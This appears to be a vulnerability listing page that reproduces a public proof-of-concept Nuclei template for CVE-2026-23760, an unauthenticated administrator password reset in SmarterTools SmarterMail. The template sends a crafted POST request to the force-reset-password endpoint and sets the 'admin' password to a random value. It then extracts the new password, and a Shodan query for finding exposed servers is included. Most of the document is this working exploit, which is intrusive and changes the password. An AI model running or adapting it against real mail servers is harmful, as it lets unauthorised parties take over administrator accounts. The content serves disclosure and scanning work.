漏洞描述
Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
CVE-2026-23760: SmarterTools SmarterMail - Admin Password Reset
PoC代码[已公开]
id: CVE-2026-23760
info:
name: SmarterTools SmarterMail - Admin Password Reset
author: watchTowr,DhiyaneshDk
severity: critical
description: |
Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
impact: |
Unauthenticated attackers can reset administrator passwords, leading to full administrative compromise of the system.
remediation: |
Upgrade to build 9511 or later.
reference:
- https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/
metadata:
verified: true
max-request: 1
shodan-query: html:"SmarterMail"
tags: cve,cve2026,intrusive,smartmail,admin,auth-bypass,vkev
variables:
password: "{{rand_text_alphanumeric(12)}}"
http:
- raw:
- |
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"{{password}}",
"ConfirmPassword": "{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- 'debugInfo'
condition: and
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"New Password: " + password'
# digest: 4a0a00473045022068c8b69b710124ba03bb3aadd30a747733ccafe868563b547303a5d925378c1a022100f5a88f4ea11adc343bbc579794b0b2f4d0351108d59447460052f4496e12f9a3:922c64590222798bb761d5b6d8e72950